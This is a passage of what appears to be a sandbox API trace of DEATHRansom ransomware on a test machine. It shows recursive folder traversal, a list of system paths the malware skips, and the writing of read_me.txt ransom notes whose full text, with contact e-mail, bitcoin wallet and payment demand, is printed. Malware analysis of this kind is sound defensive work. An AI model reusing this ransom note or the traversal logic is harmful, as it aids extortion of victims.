dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.982] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\.") returned 50 [0075.982] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.982] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.982] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8230db70, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x838f5ab0, ftLastAccessTime.dwHighDateTime=0x1d4d333, ftLastWriteTime.dwLowDateTime=0x838f5ab0, ftLastWriteTime.dwHighDateTime=0x1d4d333, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.982] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\..") returned 51 [0075.982] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.982] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d52c50, ftCreationTime.dwHighDateTime=0x1d4c8d9, ftLastAccessTime.dwLowDateTime=0xeb9327a0, ftLastAccessTime.dwHighDateTime=0x1d4ce8c, ftLastWriteTime.dwLowDateTime=0xeb9327a0, ftLastWriteTime.dwHighDateTime=0x1d4ce8c, nFileSizeHigh=0x0, nFileSizeLow=0x10e91, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="4p0JS35Ljis1Fy4ggt0.avi", cAlternateFileName="4P0JS3~1.AVI")) returned 1 [0075.982] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\4p0JS35Ljis1Fy4ggt0.avi") returned 72 [0075.983] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf04533a0, ftCreationTime.dwHighDateTime=0x1d4d121, ftLastAccessTime.dwLowDateTime=0x98c1e440, ftLastAccessTime.dwHighDateTime=0x1d4d1b0, ftLastWriteTime.dwLowDateTime=0x98c1e440, ftLastWriteTime.dwHighDateTime=0x1d4d1b0, nFileSizeHigh=0x0, nFileSizeLow=0x26f2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CaHQKOOzjSdnw.mp4", cAlternateFileName="CAHQKO~1.MP4")) returned 1 [0075.983] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\CaHQKOOzjSdnw.mp4") returned 66 [0075.983] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x375a53f0, ftCreationTime.dwHighDateTime=0x1d4cfd4, ftLastAccessTime.dwLowDateTime=0x5e28c890, ftLastAccessTime.dwHighDateTime=0x1d4cb6a, ftLastWriteTime.dwLowDateTime=0x5e28c890, ftLastWriteTime.dwHighDateTime=0x1d4cb6a, nFileSizeHigh=0x0, nFileSizeLow=0x161ec, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="m6EAI.flv", cAlternateFileName="")) returned 1 [0075.983] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\m6EAI.flv") returned 58 [0075.983] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e61450, ftCreationTime.dwHighDateTime=0x1d4ca0f, ftLastAccessTime.dwLowDateTime=0x79ebad00, ftLastAccessTime.dwHighDateTime=0x1d4c8f8, ftLastWriteTime.dwLowDateTime=0x79ebad00, ftLastWriteTime.dwHighDateTime=0x1d4c8f8, nFileSizeHigh=0x0, nFileSizeLow=0xef74, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PkO5bkvD.avi", cAlternateFileName="")) returned 1 [0075.983] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\PkO5bkvD.avi") returned 61 [0075.983] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0968d20, ftCreationTime.dwHighDateTime=0x1d4d52e, ftLastAccessTime.dwLowDateTime=0x16622db0, ftLastAccessTime.dwHighDateTime=0x1d4d2ba, ftLastWriteTime.dwLowDateTime=0x16622db0, ftLastWriteTime.dwHighDateTime=0x1d4d2ba, nFileSizeHigh=0x0, nFileSizeLow=0x97d0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Rp2xQN71YX jTlH.mp4", cAlternateFileName="RP2XQN~1.MP4")) returned 1 [0075.983] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\Rp2xQN71YX jTlH.mp4") returned 68 [0075.983] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef4b310, ftCreationTime.dwHighDateTime=0x1d4d091, ftLastAccessTime.dwLowDateTime=0x75c64990, ftLastAccessTime.dwHighDateTime=0x1d4cec7, ftLastWriteTime.dwLowDateTime=0x75c64990, ftLastWriteTime.dwHighDateTime=0x1d4cec7, nFileSizeHigh=0x0, nFileSizeLow=0x66ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Xx vJjBJEj e7O3gHCh.flv", cAlternateFileName="XXVJJB~1.FLV")) returned 1 [0075.983] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\Xx vJjBJEj e7O3gHCh.flv") returned 72 [0075.983] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef4b310, ftCreationTime.dwHighDateTime=0x1d4d091, ftLastAccessTime.dwLowDateTime=0x75c64990, ftLastAccessTime.dwHighDateTime=0x1d4cec7, ftLastWriteTime.dwLowDateTime=0x75c64990, ftLastWriteTime.dwHighDateTime=0x1d4cec7, nFileSizeHigh=0x0, nFileSizeLow=0x66ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Xx vJjBJEj e7O3gHCh.flv", cAlternateFileName="XXVJJB~1.FLV")) returned 0 [0075.983] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.983] wnsprintfW (in: pszDest=0x8e21120, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\read_me.txt") returned 60 [0075.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a8 [0076.024] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.024] WriteFile (in: hFile=0x8a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.025] CloseHandle (hObject=0x8a8) returned 1 [0076.025] GetProcessHeap () returned 0x4f10000 [0076.025] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e21120 | out: hHeap=0x4f10000) returned 1 [0076.025] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaaa14d0, ftCreationTime.dwHighDateTime=0x1d4ca26, ftLastAccessTime.dwLowDateTime=0x7bab5080, ftLastAccessTime.dwHighDateTime=0x1d4c599, ftLastWriteTime.dwLowDateTime=0x7bab5080, ftLastWriteTime.dwHighDateTime=0x1d4c599, nFileSizeHigh=0x0, nFileSizeLow=0x14dd0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="mTmULUBUagOqv.mp4", cAlternateFileName="MTMULU~1.MP4")) returned 1 [0076.025] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mTmULUBUagOqv.mp4") returned 58 [0076.025] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.025] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\read_me.txt") returned 52 [0076.025] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5f66dd0, ftCreationTime.dwHighDateTime=0x1d4cf4f, ftLastAccessTime.dwLowDateTime=0x5e305960, ftLastAccessTime.dwHighDateTime=0x1d4c62a, ftLastWriteTime.dwLowDateTime=0x5e305960, ftLastWriteTime.dwHighDateTime=0x1d4c62a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Sn6Fn", cAlternateFileName="")) returned 1 [0076.025] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn") returned 46 [0076.025] lstrcmpW (lpString1="Sn6Fn", lpString2="..") returned 1 [0076.025] lstrcmpW (lpString1="Sn6Fn", lpString2=".") returned 1 [0076.025] StrStrW (lpFirst="sn6fn", lpSrch="programdata") returned 0x0 [0076.025] StrStrW (lpFirst="sn6fn", lpSrch="$recycle.bin") returned 0x0 [0076.025] StrStrW (lpFirst="sn6fn", lpSrch="program files") returned 0x0 [0076.025] StrStrW (lpFirst="sn6fn", lpSrch="windows") returned 0x0 [0076.025] StrStrW (lpFirst="sn6fn", lpSrch="all users") returned 0x0 [0076.026] StrStrW (lpFirst="sn6fn", lpSrch="appdata") returned 0x0 [0076.026] GetProcessHeap () returned 0x4f10000 [0076.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b800c8 [0076.026] lstrcpyW (in: lpString1=0x8b800c8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn" [0076.026] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 90 [0076.026] QueueUserWorkItem (Function=0x40a710, Context=0x8b800c8, Flags=0x0) returned 1 [0076.026] GetProcessHeap () returned 0x4f10000 [0076.026] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b900d0 [0076.026] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\*") returned 48 [0076.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5f66dd0, ftCreationTime.dwHighDateTime=0x1d4cf4f, ftLastAccessTime.dwLowDateTime=0x5e305960, ftLastAccessTime.dwHighDateTime=0x1d4c62a, ftLastWriteTime.dwLowDateTime=0x5e305960, ftLastWriteTime.dwHighDateTime=0x1d4c62a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.026] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\.") returned 48 [0076.026] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.026] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5f66dd0, ftCreationTime.dwHighDateTime=0x1d4cf4f, ftLastAccessTime.dwLowDateTime=0x5e305960, ftLastAccessTime.dwHighDateTime=0x1d4c62a, ftLastWriteTime.dwLowDateTime=0x5e305960, ftLastWriteTime.dwHighDateTime=0x1d4c62a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.026] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\..") returned 49 [0076.026] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.026] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac94380, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0x7bff58c0, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0x7bff58c0, ftLastWriteTime.dwHighDateTime=0x1d4d493, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1XLsojndpt9tv", cAlternateFileName="1XLSOJ~1")) returned 1 [0076.026] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv") returned 60 [0076.026] lstrcmpW (lpString1="1XLsojndpt9tv", lpString2="..") returned 1 [0076.026] lstrcmpW (lpString1="1XLsojndpt9tv", lpString2=".") returned 1 [0076.026] StrStrW (lpFirst="1xlsojndpt9tv", lpSrch="programdata") returned 0x0 [0076.026] StrStrW (lpFirst="1xlsojndpt9tv", lpSrch="$recycle.bin") returned 0x0 [0076.026] StrStrW (lpFirst="1xlsojndpt9tv", lpSrch="program files") returned 0x0 [0076.026] StrStrW (lpFirst="1xlsojndpt9tv", lpSrch="windows") returned 0x0 [0076.026] StrStrW (lpFirst="1xlsojndpt9tv", lpSrch="all users") returned 0x0 [0076.026] StrStrW (lpFirst="1xlsojndpt9tv", lpSrch="appdata") returned 0x0 [0076.027] GetProcessHeap () returned 0x4f10000 [0076.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0076.027] lstrcpyW (in: lpString1=0x8af0080, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv" [0076.027] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 91 [0076.027] QueueUserWorkItem (Function=0x40a710, Context=0x8af0080, Flags=0x0) returned 1 [0076.027] GetProcessHeap () returned 0x4f10000 [0076.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\*") returned 62 [0076.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac94380, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0x7bff58c0, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0x7bff58c0, ftLastWriteTime.dwHighDateTime=0x1d4d493, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfea28 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\.") returned 62 [0076.027] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac94380, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0x7bff58c0, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0x7bff58c0, ftLastWriteTime.dwHighDateTime=0x1d4d493, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\..") returned 63 [0076.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb084170, ftCreationTime.dwHighDateTime=0x1d4c915, ftLastAccessTime.dwLowDateTime=0x8dd906b0, ftLastAccessTime.dwHighDateTime=0x1d4d018, ftLastWriteTime.dwLowDateTime=0x8dd906b0, ftLastWriteTime.dwHighDateTime=0x1d4d018, nFileSizeHigh=0x0, nFileSizeLow=0x13386, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Bx5kxDo8JklXYWeXrJN.mp4", cAlternateFileName="BX5KXD~1.MP4")) returned 1 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\Bx5kxDo8JklXYWeXrJN.mp4") returned 84 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3bb1300, ftCreationTime.dwHighDateTime=0x1d4cd49, ftLastAccessTime.dwLowDateTime=0x8bb4e470, ftLastAccessTime.dwHighDateTime=0x1d4cfe7, ftLastWriteTime.dwLowDateTime=0x8bb4e470, ftLastWriteTime.dwHighDateTime=0x1d4cfe7, nFileSizeHigh=0x0, nFileSizeLow=0x16e8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="KjzG1Txqb_0l.avi", cAlternateFileName="KJZG1T~1.AVI")) returned 1 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\KjzG1Txqb_0l.avi") returned 77 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15647880, ftCreationTime.dwHighDateTime=0x1d4c6a0, ftLastAccessTime.dwLowDateTime=0xda50d6b0, ftLastAccessTime.dwHighDateTime=0x1d4d0a1, ftLastWriteTime.dwLowDateTime=0xda50d6b0, ftLastWriteTime.dwHighDateTime=0x1d4d0a1, nFileSizeHigh=0x0, nFileSizeLow=0x113d4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="QZrSw.mkv", cAlternateFileName="")) returned 1 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\QZrSw.mkv") returned 70 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e64d920, ftCreationTime.dwHighDateTime=0x1d4d1aa, ftLastAccessTime.dwLowDateTime=0xab2eb7d0, ftLastAccessTime.dwHighDateTime=0x1d4d443, ftLastWriteTime.dwLowDateTime=0xab2eb7d0, ftLastWriteTime.dwHighDateTime=0x1d4d443, nFileSizeHigh=0x0, nFileSizeLow=0xa345, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TD3IoIpq2FumC-ki.avi", cAlternateFileName="TD3IOI~1.AVI")) returned 1 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\TD3IoIpq2FumC-ki.avi") returned 81 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5902680, ftCreationTime.dwHighDateTime=0x1d4d0b8, ftLastAccessTime.dwLowDateTime=0xbc980ca0, ftLastAccessTime.dwHighDateTime=0x1d4c805, ftLastWriteTime.dwLowDateTime=0xbc980ca0, ftLastWriteTime.dwHighDateTime=0x1d4c805, nFileSizeHigh=0x0, nFileSizeLow=0x17be5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ywgd7W1qu5T.mp4", cAlternateFileName="YWGD7W~1.MP4")) returned 1 [0076.027] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\ywgd7W1qu5T.mp4") returned 76 [0076.027] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5902680, ftCreationTime.dwHighDateTime=0x1d4d0b8, ftLastAccessTime.dwLowDateTime=0xbc980ca0, ftLastAccessTime.dwHighDateTime=0x1d4c805, ftLastWriteTime.dwLowDateTime=0xbc980ca0, ftLastWriteTime.dwHighDateTime=0x1d4c805, nFileSizeHigh=0x0, nFileSizeLow=0x17be5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ywgd7W1qu5T.mp4", cAlternateFileName="YWGD7W~1.MP4")) returned 0 [0076.028] FindClose (in: hFindFile=0x7cfea28 | out: hFindFile=0x7cfea28) returned 1 [0076.028] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\read_me.txt") returned 72 [0076.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ac [0076.028] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 